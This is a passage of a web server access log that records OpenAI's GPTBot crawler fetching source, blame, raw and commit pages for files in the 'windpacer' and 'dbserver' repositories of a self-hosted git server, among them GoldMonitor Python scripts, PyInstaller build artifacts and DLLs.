compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 10262] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11400] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" +[17/Feb/2026:14:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json?display=source" [Client 74.7.227.38] [Length 11465] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:14:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12294] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:14:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10651] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:14:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10642] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" +[17/Feb/2026:14:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10673] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" +[17/Feb/2026:14:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12369] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 10856] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:14:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12371] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11694] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:14:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110365] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 10918] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 2179832] [Gzip 21.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11519] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11376] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11523] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110366] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:14:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110337] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:14:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 156029] [Gzip 31.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 4258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:14:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9873] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10443] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 156029] [Gzip 31.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 155992] [Gzip 31.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18585] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 10853] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12520] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19390] [Gzip 6.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20757] [Gzip 7.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 10857] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12491] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:25:50 +0000] - 